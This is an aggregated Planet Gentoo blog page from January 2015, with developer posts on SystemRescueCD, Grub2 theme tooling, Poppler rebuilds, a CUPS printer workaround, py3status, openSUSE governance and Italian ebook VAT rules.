Fourthly, if you hear skipping, you can try playing with ‘Frames/Period’ in JACK’s setup. Or reduce the sample rate.

January 14, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Cool Gentoo-derived projects (I): SystemRescueCD (January 14, 2015, 22:53 UTC)

Gentoo Linux is the foundation for quite a few very cool and useful projects. So, I'm starting (hopefully) a series of blog posts here... and the first candidate is a personal favourite of mine, the famous SystemRescueCD.

http://www.sysresccd.org/
Ever needed a powerful Linux boot CD with all possible tools available to fix your system? You switched hardware and now your kernel hangs on boot? You want to shrink your Microsoft Windows installation to the absolute minimum to have more space for your penguin picture collection? Your Microsoft Windows stopped booting but you still need to get your half-finished PhD thesis off the hard drive? Or maybe you just want to install the latest and greatest Gentoo Linux on your new machine?

For all these cases, SystemRescueCD is the Swiss army knife of your choice. With lots of hardware support, filesystem support, software, and boot options ranging from CD and DVD to installation on USB stick and booting from a floppy disc (!), just about everything is covered. In addition, SystemRescueCD comes with a lot of documentation in several languages.

The page on how to create customized versions of SystemRescueCD gives a few glimpses of how Gentoo is used here. (I'm also playing with a running version in a virtual machine while I type this. :) Basically the internal filesystem is a normal Gentoo x86 (i.e. 32bit userland) installation, with distfiles, portage tree, and some development files (headers etc.) removed to decrease disk space usage. (Skimming over the files in /etc/portage, the only really unusual thing I can see is that >=gcc-4.5 is masked; the installed GCC version is 4.4.7 - but who cares in this particular case.) After uncompressing the filesystem and re-adding the Gentoo portage tree, it can be used as a chroot, and (with some re-emerging of dependencies because of the deleted header files) packages can be added, deleted, or modified.
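For the curious, entering that filesystem from a running Gentoo host looks roughly like this; a sketch, where the ISO name and the sysrcd.dat squashfs path should be checked against your version:

mount -o loop systemrescuecd-x86.iso /mnt/cdrom
unsquashfs -d /mnt/sysrcd /mnt/cdrom/sysrcd.dat
mount --rbind /dev /mnt/sysrcd/dev
mount -t proc proc /mnt/sysrcd/proc
chroot /mnt/sysrcd /bin/bash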

Downsides? Well, not much. Even if you select a 64bit Kernel on boot, the userland will always be 32bit. Which is fine for maximum flexibility and running on ancient hardware, but of course imposes the usual limits. And rsync then runs out of memory after copying a few TByte of data (hi Patrick)... :D

Want to try? Just emerge app-admin/systemrescuecd-x86 and you'll comfortably find the ISO image installed on your harddrive in /usr/share/systemrescuecd/.



From the /root/AUTHORS file in the rescue system:
SystemRescueCd (x86 edition)
Homepage: http://www.sysresccd.org/
Forums: http://www.sysresccd.org/forums/

* Main Author:  Francois Dupoux
* Other contributors:
  - Jean-Francois Tissoires (Oscar and many help for testing beta versions)
  - Franck Ladurelle (many suggestions, and help for scripts)
  - Pierre Dorgueil (reported many bugs and improvements)
  - Matmas did the port of linuxrc for loadlin
  - Gregory Nowak (tested the speakup)
  - Fred alias Sleeper (Eagle driver)
  - Thanks to Melkor for the help to port to unicode

Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Fortune cookie wisdom part VI (January 14, 2015, 19:11 UTC)

It’s been a long time since I’ve posted a new set of “Fortune cookie wisdom,” but I think that I have five good ones here. Before reading them, if you’d like to check out the previous posts in the series, you can with the links below:

Now that you’ve wasted a good amount of time reading those previous posts (hey, it’s better than watching more cat videos on YouTube, right?), here are the new ones:

  • Generosity and perfection are your everlasting goals.
  • We must always have old memories and young hopes.
  • Discontent is the first step in the progress of a man or a nation.
  • An important word of advice may come from a child.
  • Someone is looking up to you. Don’t let that person down.

I think that the third one is especially true in these times. With many political, social, economic, and societal decisions being made without full support of the people, it is necessary for individuals to express discontent before any change can begin. The fourth one is incredibly important to remember. We all too often forget that children can show us different ways of looking at otherwise maladroit or stale situations. They can enlighten us and open our eyes to perspectives that we may not have considered with our “adult” worldviews. I’m reminded of the recent Why advertisement from Charles Schwab:

It also ties nicely to the final one that I posted today. We need to remember to always act with integrity because there is always someone looking up to us, and modelling his or her behaviours after our own.

Good stuff, but like the previous post, I think that there was less of an emphasis on the funnier side of the fortune cookies. Hopefully I’ll get some new funny ones soon.

Cheers,
Zach

Donnie Berkholz a.k.a. dberkholz (homepage, bugs)
Gentoo needs focus to stay relevant (January 14, 2015, 03:36 UTC)

After nearly 12 years working on Gentoo and hearing blathering about how “Gentoo is about choice” and “Gentoo is a metadistribution,” I’ve come to a conclusion about where we need to go if we want to remain viable as a Linux distribution.

If we want to have any relevance, we need to have focus. Everything for everybody is a guarantee that you’ll be nothing for anybody. So I’ve come up with three specific use cases for Gentoo that I’d like to see us focus on:

People developing software

As Gentoo comes, by default, with a guaranteed-working toolchain, it’s a natural fit for software developers. A few years back, I tried to set up a development environment on Ubuntu. It was unbelievably painful. More recently, I attempted the same on a Mac. Same result — a total nightmare if you aren’t building for Mac or iOS.

Gentoo, on the other hand, provides a proven-working development environment, because you build everything from scratch as you install the OS. If you need headers or some library, it’s already there. No problem. Meanwhile, I’ve attempted to get all of the bare-bones dev packages installed on many other systems, and it’s been hugely painful.

Frankly, I’ve never come across a dev environment as easy as Gentoo’s, assuming you’ve managed to set it up as a user in the first place. And that’s the real problem.

People who need extreme flexibility (embedded, etc.)

Nearly 10 years ago, I founded the high-performance clustering project in Gentoo, because it was a fantastic fit for my needs as an end user in a higher-ed setting. As it turns out, it was also a good fit for a number of other folks, primarily in academia but also including the Adelie Linux team.

What we found was that you could get an extra 5% or so of performance out of building everything from scratch. At small scale that sounds absurd, but when that translates into 5-6 digits or more of infrastructure purchases, suddenly it makes a lot more sense.

In related environments, I worked on porting v5 of the Linux Terminal Server Project (LTSP) to Gentoo. This was the first version that was distro-native rather than pretending to be a custom distro in its own right, and the lightweight footprint of a diskless terminal was a perfect fit for Gentoo.

In fact, around the same time I fit Gentoo onto a 1.8MB floppy-disk image, including either the dropbear SSH client or the kdrive X server for a graphical environment. This was only possible through the magic of the ROOT and PORTAGE_CONFIGROOT variables, which you couldn’t find in any other distro.
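For the curious, the core of that trick looks roughly like this (the package choice and paths are illustrative, not the exact commands from back then):

# build into a separate, minimal root with its own portage configuration
export ROOT=/tmp/tinyroot
export PORTAGE_CONFIGROOT=/tmp/tinyroot
mkdir -p "$ROOT/etc/portage"
# a stripped-down make.conf and profile live under $PORTAGE_CONFIGROOT,
# so the host configuration never leaks into the tiny image
emerge net-misc/dropbear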

Other distros such as ChromeOS and CoreOS have taken similar advantage of Gentoo’s metadistribution nature to build heavily customized Linux distros.

People who want to learn how Linux works

Finally, another key use case for Gentoo is people who really want to understand how Linux works. Because the installation handbook actually walks you through the entire process of installing a Linux distro by hand, you acquire a unique viewpoint and skillset regarding what it takes to run Linux, well beyond what other distros require. In fact, I’d argue that it’s a uniquely portable and low-level skillset that you can apply much more broadly than those you could acquire elsewhere.

In conclusion

I’ve suggested three core use cases that I think Gentoo should focus on. If something doesn’t fit those use cases, I would suggest that we allow it, but not specifically dedicate effort to enabling it.

We’ve become overly deadened to how people want to use Linux, and this is my proposal for how we could regain that focus.


Tagged: gentoo

January 12, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Tool to preview Grub2 themes easily (using KVM) (January 12, 2015, 21:04 UTC)

The short version: previewing a Grub2 theme live does not have to be hard.

Hi!

When I first wrote about a (potentially too lengthy) way to make a Grub2 theming playground in 2012, I was hoping that people would start throwing Gentoo Grub2 themes around, so that it would become harder to pick one than to find one. As you know, that didn’t happen.

Therefore, I am taking a few more steps now.

So this post is about that new tool: grub2-theme-preview. Basically, it does the steps I blogged about in 2012, automated:

  • Creates a sparse disk as a regular file
  • Adds a partition to it and formats using ext2
  • Installs Grub2, copies a theme of your choice and a config file to make it work
  • Starts KVM

That way, a theme creator can concentrate on the actual work on the theme.
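For the curious, the manual equivalent of those steps looks roughly like this (device names, sizes, and the KVM invocation are simplified assumptions, not the tool's actual code):

truncate -s 128M disk.img                # sparse disk as a regular file
parted -s disk.img mklabel msdos mkpart primary ext2 1MiB 100%
losetup -P /dev/loop0 disk.img           # expose the disk and its partition
mkfs.ext2 /dev/loop0p1
mount /dev/loop0p1 /mnt/target
grub2-install --boot-directory=/mnt/target/boot /dev/loop0
cp -r mytheme /mnt/target/boot/grub/themes/   # plus a grub.cfg selecting it
umount /mnt/target
losetup -d /dev/loop0
qemu-kvm -hda disk.img                   # boot the result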

To give an example, to preview theme “Archxion” off GitHub as of today you could run:

git clone https://github.com/hartwork/grub2-theme-preview.git
git clone https://github.com/Generator/Grub2-themes.git
cd grub2-theme-preview
./grub2-theme-preview ../Grub2-themes/Archxion/

Once grub2-theme-preview has distutils/setuptools packaging and a Gentoo ebuild, that will get a bit easier still.

The current usage is:

# ./grub2-theme-preview --help
usage: grub2-theme-preview [-h] [--image] [--grub-cfg PATH] [--version] PATH

positional arguments:
  PATH             Path of theme directory (or image file) to preview

optional arguments:
  -h, --help       show this help message and exit
  --image          Preview a background image rather than a whole theme
  --grub-cfg PATH  Path grub.cfg file to apply
  --version        show program's version number and exit

Before using the tool, be warned that:

  • it is alpha/beta software,
  • it needs root permissions for some parts (it calls sudo), and
  • I therefore don’t give any warranty for anything right now!

Here is what to expect from running

# ./grub2-theme-preview /usr/share/grub/themes/gutsblack-archlinux/

assuming you have grub2-themes/gutsblack-archlinux off the grub2-themes overlay installed with this grub.cfg file:

Another example uses the --image switch for background-image-only themes, with a 640×480 rendering of the vector remake of gentoo-cow:


The latter is a good candidate for that Grub2 version of media-gfx/grub-splashes I mentioned earlier.

I’m looking forward to your patches and pull requests!


New Gentoo overlay: grub2-themes (January 12, 2015, 20:38 UTC)

Hi!

I’ve been looking around for Grub2 themes a bit and started a dedicated overlay so as not to litter the main repository. The overlay lives on GitHub as gentoo/grub2-themes-overlay.

Any Gentoo developer on GitHub probably has received a

[GitHub] Subscribed to gentoo/grub2-themes-overlay notifications

mail already. I put it into the Gentoo project account rather than my personal account because I do not want this to be a solo project: you are welcome to extend and improve it. That includes pull requests from users.

The licensing situation (in the overlay, as well as with Grub2 themes in general) is not optimal. Right now, more or less all of the themes have all-rights-reserved licenses, since logos of various Linux distributions are included. So even if the theme itself is licensed under GPL v2 or later, the whole thing including the icons is not. I am considering adding a USE flag icons to control cutting the icons away. That way, people with ACCEPT_LICENSE="-* @FREE" could still use at least some of these themes. By the way, I welcome help identifying the licenses of each of the original distribution logos, if that sounds like an interesting challenge to you.
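To illustrate what that could look like for users (the icons flag is only an idea at this point, so the package.use line below is hypothetical):

# /etc/portage/make.conf: only accept free licenses
ACCEPT_LICENSE="-* @FREE"

# /etc/portage/package.use: hypothetical, once an icons flag exists
grub2-themes/gutsblack-archlinux -icons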

More to come on Grub2 themes. Stay tuned.

Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Today's good news is that our manuscript "Thermally induced subgap features in the cotunneling spectroscopy of a carbon nanotube" has been accepted for publication by New Journal of Physics.
In a way, this work builds directly on our previous publication on thermally induced quasiparticles in niobium-carbon nanotube hybrid systems. As a contribution mainly from our theory colleagues, the modelling of transport processes is now enhanced and extended to cotunneling processes within Coulomb blockade. A generalized master equation based on the reduced density matrix approach in the charge-conserved regime is derived, applicable to any strength of the intradot interaction and to finite values of the superconducting gap.
We show both theoretically and experimentally that distinct thermal "replica lines", due to the finite quasiparticle occupation of the superconductor, also occur in cotunneling spectroscopy at higher temperatures T~1K: the now-possible transport processes lead to additional conductance both at zero bias and at a finite voltage corresponding to an excitation energy; experiment and theory match very well.

"Thermally induced subgap features in the cotunneling spectroscopy of a carbon nanotube"
S. Ratz, A. Donarini, D. Steininger, T. Geiger, A. Kumar, A. K. Hüttel, Ch. Strunk, and M. Grifoni
New J. Phys. 16, 123040 (2014), arXiv:1408.5000 (PDF)

http://www.akhuettel.de/publications/forschung.pdf
The 4/2014 edition of the "forschung" magazine of the DFG, published just a few days ago, includes an article about the work of our research group (in German)! Enjoy!

"Zugfest, leitend, defektfrei"
Kohlenstoff-Nanoröhren sind ein faszinierendes Material. In Experimenten bei ultratiefen Temperaturen versuchen Physiker, ihre verschiedenen Eigenschaften miteinander in Wechselwirkung zu bringen – und so Antworten auf grundlegende Fragen zu finden.
Andreas K. Hüttel
forschung 4/2014, 10-13 (2014) (PDF)

January 10, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Poppler is contributing to global warming (January 10, 2015, 19:48 UTC)


As you may have noticed by now if you're running ~arch, the Poppler release policies have changed.

Previously, Poppler (app-text/poppler) had stable branches with an even middle version number, e.g. 0.24, and bug fix releases 0.24.1, 0.24.2, 0.24.3, ... with a (most of the time) stable ABI. This meant that such upgrades could be installed without the need to rebuild any applications using Poppler. Development of new features took place in git master or in development releases with an odd middle number, say 0.25.1; those we never packaged in Gentoo anyway.

Now the stable branches are gone, and Poppler has moved to a flat development model, with the 0.28.1 stable release (stable as intended by upstream, not "Gentoo stable") being followed by 0.29.0 and now, another month later, 0.30.0. Unsurprisingly, the ABI and the soversion of libpoppler.so have changed each time, triggering in Gentoo a rebuild of all applications linking to libpoppler.so. This includes, among other things, LuaTeX, Inkscape, and LibreOffice (wheee).

From a Gentoo maintainer point of view, the new schedule is not so bad; the API changes are minor (if any), and packages mostly "just compile". The only thing left to do is to check for soversion increases and bump the package subslot for the automated rebuild. We're much better off than the binary distributions, since we can just keep tracking new Poppler releases and do not need to backport e.g. critical bug fixes ourselves just so the binary package fits all the other binary packages of the distro.
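For those wondering how the automated rebuild works, here is a simplified sketch (the subslot number is illustrative, not a real ebuild excerpt): the poppler ebuild encodes the library soversion in its subslot, and consumers depend on it with the := slot operator.

# app-text/poppler: the subslot tracks the libpoppler.so soversion
SLOT="0/51"

# in a consumer such as inkscape: ':=' records the subslot at build
# time, so a subslot bump makes portage schedule an automatic rebuild
RDEPEND="app-text/poppler:="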

From a Gentoo user point of view... well, I guess you can turn the heating down a bit. If you are running ~arch you will probably see some more LibreOffice rebuilds in the near future. If things get too bad, you can always mask a new Poppler version in /etc/portage/package.mask yourself (but then better check for security bugs; glsa-check from app-portage/gentoolkit is your friend); if the number of rebuilds gets completely out of hand, we may consider adding e.g. every second Poppler version only package-masked to the portage tree.
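For example, such a temporary mask could look like this (the version number is just an example):

# /etc/portage/package.mask: hold back further poppler bumps for now
>=app-text/poppler-0.31

# ...but keep checking for security advisories
glsa-check --list affected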

Aaron W. Swenson a.k.a. titanofold (homepage, bugs)
Dell 1350cnw on Gentoo Linux with CUPS (January 10, 2015, 13:00 UTC)

You’d think that a company that has produced, and does produce, some Linux-based products would also provide CUPS drivers for its printers, like the Dell 1350cnw. Not so, it seems. Still, I was undeterred and found a way to make it happen.

First, download the driver for the Xerox Phaser 6000 in DEB format. Yeah, that’s right. We’re going to use a Xerox driver to print to our Dell printer.

Once you have it, do the following on the command line:

# unzip 6000_6010_deb_1.01_20110210.zip
# cd deb_1.01_20110210
# ar x xerox-phaser-6000-6010_1.0-1_i386.deb
# tar xf data.tar.gz
# gunzip usr/share/ppd/Xerox/Xerox_Phaser_6000B.ppd.gz
# mkdir -p /usr/lib/cups/filter/
# cp ~/deb_1.01_20110210/usr/lib/cups/filter/xrhkaz* /usr/lib/cups/filter/
# mkdir -p /usr/share/cups/Xerox/dlut/
# cp ~/deb_1.01_20110210/usr/share/cups/Xerox/dlut/Xerox_Phaser_6010.dlut /usr/share/cups/Xerox/dlut/

Or, because I’ve seen rumors that there are other flavors of Linux, if you’re on a distribution that supports DEB files, just initiate the install from the DEB file, however one does that.

Finally, add the Dell 1350cnw via the CUPS browser interface. (I used whichever protocol had “net” in the title, as the printer is connected directly to the network.) Upload ~/deb_1.01_20110210/usr/share/ppd/Xerox/Xerox_Phaser_6000B.ppd when prompted for a driver.
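If you prefer the command line over the web interface, something along these lines should work too (the printer name and network address are placeholders for your own setup):

# lpadmin -p Dell1350cnw -E -v socket://192.168.0.50:9100 \
    -P ~/deb_1.01_20110210/usr/share/ppd/Xerox/Xerox_Phaser_6000B.ppd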

Everything works as expected for me, and in color!

January 09, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

I finally took the time to watch The Perl Jam: Exploiting a 20 Year-old Vulnerability [31c3]. Oh, my, god.

January 07, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Slock 1.2 background colour (January 07, 2015, 02:41 UTC)

In a previous post, I discussed the method for changing the background colour of slock 1.1. Now that slock 1.2 is out and in the Portage tree in Gentoo, the ‘savedconfig’ USE flag works a little differently than it used to. In 1.1, the ‘savedconfig’ USE flag would essentially copy the config.mk file to /etc/portage/savedconfig/x11-misc/slock-$version. In slock 1.2, there is still a config file in that location, but it is no longer just a copy of config.mk. Rather, one will see the following two-line file:

# cat /etc/portage/savedconfig/x11-misc/slock-1.2
#define COLOR1 "black"
#define COLOR2 "#005577"

As indicated in the file, you can use either a generic colour name (like “black”) or the hex representation of the colour of your choice (see The Color Picker for an easy way to find the hex code for your colours).

There are two things to keep in mind when editing this file:

  • The initial hash (#) is NOT a comment marker (the lines are C preprocessor #define directives) and MUST remain. If you remove it, slock 1.2 will fail to compile
  • The COLOR1 variable sets the default background colour, whilst the COLOR2 variable sets the background colour once one starts typing on a slocked screen
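For example, an edited file using hex codes (the colours here are arbitrary picks) might look like this, followed by a rebuild to apply it:

# cat /etc/portage/savedconfig/x11-misc/slock-1.2
#define COLOR1 "#002b36"
#define COLOR2 "#dc322f"

# emerge --oneshot x11-misc/slock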

Hope that this information helps for those people using slock (especially within Gentoo Linux).

Cheers,
Zach

January 06, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Finding a better blog workflow (January 06, 2015, 00:12 UTC)

I have been ranting about editors in the past few months, a year after considering shutting the blog down. After some more thinking and fighting, I now have a better plan, and the blog is not going away.

First of all, I decided to switch my editing to Draft and started paying for a subscription at $3.99/month. It's a simple-as-it-can-be editor, with no pretence. It provides the kind of "spaced out" editing that is so trendy nowadays, and a so-called "Hemingway" mode that does not allow you to delete. I don't really care for the latter, but it's not so bad.

More importantly, it gets saving right: if the same content is being edited in two different browsers, one gets locked (so I can't overwrite the content), and a big red message telling me that it can't save appears the moment I try to edit something while the Internet connection is gone or I am logged out. It has no fancy HTML editor; instead, it is designed around Markdown, which is what I'm using to post on my blog nowadays as well. It supports C-i and C-b just fine.

As for the blog engine, I decided not to change it. Yet. But I also decided that upgrading it to Publify is not an option. Among other things, as I went digging trying to fix a few of the problems I've been having, I discovered just how much spaghetti code it was to begin with, and I lost any trust in the developers. Continuing to build upon Typo without taking the time to rewrite it from scratch is, in my opinion, time wasted. Upstream's direction has been building more and more features to support Heroku, CDNs, and so on and so forth — my target is to make it slimmer, so I started deleting good chunks of code.

The results have been positive, and after some database cleanup and the removal of support for structures that were never implemented to begin with (like primary and hierarchical categories), browsing the blog should be much faster and less of a pain. Among the features I dropped altogether is theming, as the code is now very specific to my setup; that allowed me to use the Rails asset pipeline to compile the stylesheets and JavaScript, which should lead to faster load times for everyone (even though it also caused a global cache invalidation, sorry about that!)

My current plan is to not spend too much time on the blog engine in the next few weeks, as it has reached a point where it's stable enough, but rather to fix a few things in the UI itself, such as the Amazon ads loading, which currently causes some things to jump around the page a little too much. I also need to find a new, better way to deal with image lightboxes — I don't have many in use, but right now they are implemented with a mixture of Typo magic and JavaScript — ideally I'd like the JavaScript to take care of everything, attaching itself to data-fullsize-url attributes or something like that. But I have not looked into replacements explicitly yet; suggestions welcome. Similarly, if anybody knows a good JavaScript syntax highlighter to replace coderay, I'm all ears.

Ideally, I'll be able to move to Rails 4 (and thus Passenger 4) pretty soon, although I'm not sure how well that works with PostgreSQL. Adding (manually) some indexes to the tables, and especially making sure that the diamond-tables for tags and categories did not include NULL entries and had a proper primary key (the full row), made quite a difference in the development environment (less so in production, as more data is cached there, but it should still help if you're jumping around my old blog posts!)

Coincidentally, among the features I dropped off the codebase are the update checks and inbound links (which used the Google Blog Search service that no longer exists), making the webapp network-free. Akismet stopped working some time ago, and it is one of the things I actually want to re-introduce, but then again I need to make sure that the connection can be filtered correctly.

By the way, for those who are curious why I spend so much time on this blog: I have been able to preserve all the content I could, from my first post on Planet Gentoo in April 2005, on b2evolution. That's just a few months short of ten years now. I was also able to recover some posts from my previous KDEDevelopers blog from February of that year, and a few (older) posts in Italian that I originally sent to the Venice Free Software User Group in 2004. Which essentially means, for me, ten years of memories and words. It is dear to me, and most of you won't have any idea how much — it probably also says something about the priorities in my life, but who cares.

I'm only bothered that I can't remember where I put the backup from blogspot I made of what I was writing when I was in high school. Sure it's not exactly the most pleasant writing (and it was all in Italian), but I really would like for it to be part of this single base. Oh and this is also the reason why you won't see me write more on G+ or Facebook — those two and Twitter are essentially just a rant platform to me, but this blog is part of my life.

January 05, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Gentoo Grub 2.x theme? (January 05, 2015, 22:11 UTC)

Hi!

It’s 2015 and I have not heard of any Gentoo GRUB 2.x themes, yet. Have you?

If you could imagine working on a theme based on the vector remake of gentoo-cow (with sound licensing), please get in touch!

CoreOS is based on… Gentoo! (January 05, 2015, 16:39 UTC)

I first heard about CoreOS from LWN.net, in the news item on Rocket, CoreOS’s re-write of and alternative to Docker.

I ran into CoreOS again at 31c3 and learned that it is based on… Gentoo! A few links for proof:

January 04, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

I'm posting this here because a new LibreOffice version was stabilized two days ago, and at the same time a hidden bug crept in...

Because of an unintended interaction between a Python-related eclass and the app-office/libreoffice ebuilds (any version), recently self-generated libreoffice binary packages (see below for the exact timeframe) can fail to install with the error

* ERROR: app-office/libreoffice-4.3.5.2::gentoo failed (setup phase):
* PYTHON_CFLAGS is invalid for python-r1 suite, please take a look @ https://wiki.gentoo.org/wiki/Project:Python/Python.eclass_conversion#PYTHON_CFLAGS 

The problem is fixed now, but any libreoffice binary packages generated with a portage tree from Fri Jan 2 00:15:15 2015 UTC to Sun Jan 4 22:18:12 2015 UTC will fail to reinstall. The current recommendation is to delete the self-generated binary package and re-install libreoffice from sources (or use libreoffice-bin).
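Assuming the default PKGDIR, the cleanup would look something like this (adjust the path and version to your own setup):

# remove the broken self-built binary package
rm /usr/portage/packages/app-office/libreoffice-4.3.5.2.tbz2
# rebuild from sources, ignoring binary packages this time
emerge --oneshot --usepkg=n app-office/libreoffice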

This does NOT affect app-office/libreoffice-bin.

Updates may be posted here or on bug 534726. Happy heating. At least it's winter.

Alexys Jacob a.k.a. ultrabug (homepage, bugs)
py3status v2.0 (January 04, 2015, 19:16 UTC)

I’m very pleased to announce the release of py3status v2.0, which I’d like to dedicate to the person behind all the nice improvements this release features: @tablet-mode!

His idea on issue #44 was to make py3status modules configurable. After some thought, and after merging my own development plans, we ended up with what I believe are the most ambitious features py3status has provided so far.

Features

The logic behind this release is that py3status now wraps and extends your i3status.conf, which enables all the following crazy features:

Click events are now supported for all your i3bar modules, i3status and py3status alike, thanks to the new on_click parameter, which you can use like any other i3status.conf parameter on any module. It has never been so easy to handle click events!

This is a quick and small example of what it looks like:

# run thunar when I left click on the / disk info module
disk / {
    format = "/ %free"
    on_click 1 = "exec thunar /"
}
  • All py3status contributed modules are now shipped and usable directly, without the need to copy them to your local folder. They can also be configured directly from your i3status config (see below)

There is no need to copy and edit the contributed py3status modules you like and wish to use; you can now load and configure them directly from your i3status.conf.

All py3status modules (contributed ones and user-loaded ones) are now loaded and ordered using the usual order += syntax in your i3status.conf!
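For example (the module name and its parameters here are illustrative; check the py3status documentation for the real ones):

# i3status.conf: i3status and py3status modules share one ordering
order += "disk /"
order += "whatsmyip"

# configure the contributed module right in i3status.conf
whatsmyip {
    cache_timeout = 60
    on_click 1 = "exec firefox"
}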

  • All modules have been improved and cleaned up, and some of them got some love from contributors.
  • Every click event now triggers a refresh of the clicked module, even for i3status modules. This makes your i3bar more responsive than ever!

Contributors

  • @AdamBSteele
  • @obb
  • @scotte
  • @tablet-mode

Thank you

  • Jakub Jedelsky: py3status is now packaged on Fedora Linux.
  • All of you users: py3status has broken the 100-star mark on GitHub; I’m still amazed by this. @Lujeni’s prophecy has come true :)
  • I still have some nice ideas in stock for even more functionality, stay tuned!

Michal Hrusecky a.k.a. miska (homepage, bugs)
Challenges in 2015 (January 04, 2015, 13:34 UTC)

Champagne Showers by Merlin2525

You might have noticed that I decided to run for the openSUSE Board. And as we have just started a new year, when everybody is evaluating the past and the future, I will do the same, mainly focusing on a few of the challenges that I see lying in front of the openSUSE Board in 2015.

SUSE/openSUSE relation

I have heard it mentioned several times, over and over: SUSE and openSUSE are two different things. But at the same time, they are pretty close. Close enough to be confusing. We have similar yet slightly distinct branding, a similar yet slightly distinct name, and a clear overlap in contributors. For people inside the project, it is easy to distinguish the two entities. For people outside, not so much.

There was a nice talk by Zvezdana and Kent at the openSUSE Conference about our branding. Part of the talk, and one thing that people notice about openSUSE and SUSE, is our logo. SUSE keeps updating its logo, and it is getting more different over time; the openSUSE logo, on the other hand, stays the same. One open question from the talk was how to fix this: either start diverging with our branding, or get closer together. I know this is mainly a question for the artwork team, but as it will affect all of us, there should be a broad discussion, and as it involves the logo and trademark, SUSE and the board need to be involved.

Apart from the logo/branding, there is also a technical aspect to the relation. We all say that openSUSE is the technical upstream of SLE. Things are developed and tested in openSUSE and then adopted by SLE. But sometimes it is vice versa, as SUSE needs to develop some feature for SLE or one of its service packs and push it there. And as the SLE and openSUSE schedules are unrelated, sometimes they can't push it into openSUSE first. Even after a release, openSUSE and SLE start diverging, and they come together once in five years or so, when it is time to release a new SLE. It's kind of a shame that we can't help each other more often. It would be great to get SLE and openSUSE closer together in a mutually beneficial way. But this is not going to be an easy nor fast discussion, again involving quite a few teams and people. And I believe the Board should act as mediator/initiator in this discussion as well.

openSUSE Release

While we are talking about releases: we still officially have an 8-month release cycle (or, more precisely, a "whenever coolo says so" release cycle). It would be nice to decide that, since we released the last two releases after 12 months, we are switching to a one-year release cycle. Or decide to stick with eight months. Or go for something completely different. But again, the point is that this is a hard discussion to have; I believe we have to start it and reach a clear outcome, so people can count on it. There is not much for the board to do here apart from calming heated discussion, but maybe it would make sense to delay the start of this discussion until after the SLE/openSUSE relation discussion (which probably needs the board involved) and take its results into account. I personally think it definitely makes sense to at least align the SLE and openSUSE schedules a little bit…

Conference

Last year we had a great conference in Dubrovnik. It was an awesome place, with quite a few interesting discussions as every year, but unfortunately not that many people. I liked it, and hats off to the organizers, but we need to figure out what went wrong and why not so many people showed up in person. I hope for the best in The Hague and that this year's conference will again see plenty of people. Although the last conference was great, losing attendees at our most important event, the openSUSE Conference, was also kind of disturbing… So we will see what happens in The Hague.

The rest

I’m sure there will be other challenges as well. In fact, I would like even more things to happen in the coming year. But for those things, I don’t need a board; I can do them, or at least start them, myself. The few that I just mentioned are only those that I see as important, in need of some involvement from the board, and not yet entirely solved from last year. Hopefully all of them will be solved next year, and we will have different problems: how to find even the most subtle bugs once all the others are fixed, how to change the world for the better, and whether there is still anything left to improve after everything we did in 2015 :-)

January 03, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
The Italian ISBN fraud (January 03, 2015, 17:12 UTC)

Books
Photo credit: Moyan Brenn

The title of this post probably counts as clickbait, but I think there is a fraud going on in Italy related to ISBNs, and since I noted on my Facebook page that I have more information on this than the average person, even those who are usually quite well informed, I thought it worth putting down on paper.

It all started with an email I got from Amazon, in particular from the Kindle Direct Publishing service, which is how I publish Autotools Mythbuster as a Kindle book. At first I thought it was about the new VAT regulation for online services across Europe that is being announced by everybody and that will soon make most websites give you ex-VAT prices and let you figure out how much you're actually paying. And indeed it was, until you get to this postscript:

Lastly, as of January 1, 2015, Italy has put in place a new law. Applicable VAT for eBooks sold in Italy will depend on whether the book has an ISBN. All eBooks with an ISBN will have a 4% VAT rate and eBooks without an ISBN will have a 22% VAT rate. This is the rate that is added to your price on January 1st and is the rate deducted when an Italian customer purchases your book. If you obtain an ISBN after January 1st, the 4% VAT rate will then apply for future sales but we will not adjust your list price automatically.

Since I've always felt strongly that discriminating between books based on whether they are paper or bits is a bad idea, the reduced VAT rate for ebooks was actually good news. But tying it to the ISBN? Not so much. And here's why.

First of all, let's bust the myth of the ISBN being a requirement to publish a book. It's not, at least not universally. In particular, it's not a requirement in Italy, the Republic of Ireland, or the United States of America. It is also not clear to many that in many countries, including at least Italy and the Republic of Ireland, privately held companies manage ISBN distribution. In other countries there's a government agency for that, and it may well be more regulated there.

In the case of the UK agency (which also handles the Republic of Ireland and is thus relevant to me), they also make explicit that there are plenty of situations in which you should not apply an ISBN, for instance booklets that are not sold to the public (private events, museums, etc.). It might sound odd, but it makes perfect sense the moment you realize what the ISBN was designed to help with: distribution. The idea behind it is that any single edition of a book has a unique code, so when your bookstore orders from the distributor, and the distributor from the publisher, you have the same ID everywhere. A secondary benefit for citing references and bibliographies is often mentioned, but it is by far not the reason why the ISBN was introduced.

So why would you tie the VAT rate to the presence of an ISBN? I can't think of any particularly good reason off the top of my head. It makes things quite a bit more complex for online ebook stores, especially those that have not limited themselves to stocking books with an ISBN to begin with (such as Amazon, Kobo, …). But even more, it makes it almost impossible for authors to figure out how to charge buyers if both are in Europe. Everything is still easy, of course, if you're not trying to sell to Europe, or from Europe — wonder why we don't have more European startups, eh?

The bothersome part is that there is no such rule about VAT for physical books! Indeed, many people in Italy are acquainted with schemes in which you join a "club" that sends you a book every month (unless you opt out month by month; if you don't, you have to pay the price for it) and sells books at prices much lower than the bookstore's.

I'm sure they still exist, although I'm not sure Amazon leaves them much appeal now. It was how I got into Lord of the Rings: I ended up paying some €1.25 for it rather than the €30 price of the same (hardcover) edition.

All those books were printed especially for the "club" and thus had no ISBN attached to them at all. One of the reasons was probably to make it more difficult to sell them second hand. But they have always been charged at 4% VAT anyway!

